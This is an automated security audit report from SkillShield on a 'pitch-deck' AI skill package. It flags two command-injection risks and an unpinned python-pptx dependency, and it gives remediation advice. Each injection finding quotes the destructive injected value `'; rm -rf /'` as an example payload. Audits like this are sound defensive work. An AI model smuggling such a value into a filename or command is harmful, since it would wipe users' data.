Security Audit
ailabs-393/ai-labs-claude-skills:packages/skills/pitch-deck
github.com/ailabs-393/ai-labs-claude-skillsTrust Assessment
ailabs-393/ai-labs-claude-skills:packages/skills/pitch-deck received a trust score of 25/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Potential Command Injection via `grep` command, Potential Command Injection via Python script execution, Unpinned Python dependency `python-pptx`.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Static Code Analysis layer scored lowest at 25/100, indicating areas for improvement.
Last analyzed on March 14, 2026 (commit 1a12bc7a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Potential Command Injection via `grep` command The skill instructs the LLM to construct and execute a `grep` command where parts of the search pattern (`[Slide Number]`, `[Slide Name]`) are likely derived from user input. If user input is not properly sanitized before being inserted into this command, an attacker could inject arbitrary shell commands (e.g., `'; rm -rf /'`) leading to remote code execution. Avoid direct concatenation of user input into shell commands. If shell execution is necessary, use a dedicated tool execution environment that strictly validates and sanitizes all arguments, or use a library function that handles arguments safely (e.g., `subprocess.run` with `shell=False` and passing arguments as a list). | Static | SKILL.md:70 | |
| CRITICAL | Potential Command Injection via Python script execution The skill instructs the LLM to execute a Python script using `python3 scripts/create_pitch_deck.py pitch_data.json output_filename.pptx`. The `output_filename.pptx` argument is user-controlled. If user input for the filename is not properly sanitized before being passed to the shell, an attacker could inject arbitrary shell commands (e.g., `'; rm -rf /'`) leading to remote code execution. Avoid direct concatenation of user input into shell commands. If shell execution is necessary, use a dedicated tool execution environment that strictly validates and sanitizes all arguments, or use a library function that handles arguments safely (e.g., `subprocess.run` with `shell=False` and passing arguments as a list). Ensure filenames are strictly validated to prevent path traversal or command injection. | Static | SKILL.md:150 | |
| HIGH | Unpinned Python dependency `python-pptx` The skill instructs users to install the `python-pptx` library using `pip3 install python-pptx` without specifying a version. This 'unpinned' dependency can lead to supply chain vulnerabilities. If a malicious or vulnerable version of `python-pptx` is published, users installing the skill could unknowingly download and execute compromised code. This also makes builds non-deterministic. Pin the dependency to a specific, known-good version (e.g., `pip3 install python-pptx==0.6.21`). Regularly review and update pinned dependencies to incorporate security fixes. Consider using a `requirements.txt` file or similar dependency management tool. | Static | SKILL.md:204 |
Scan History
Embed Code
[](https://skillshield.io/report/7fd54d489d54799d)
Powered by SkillShield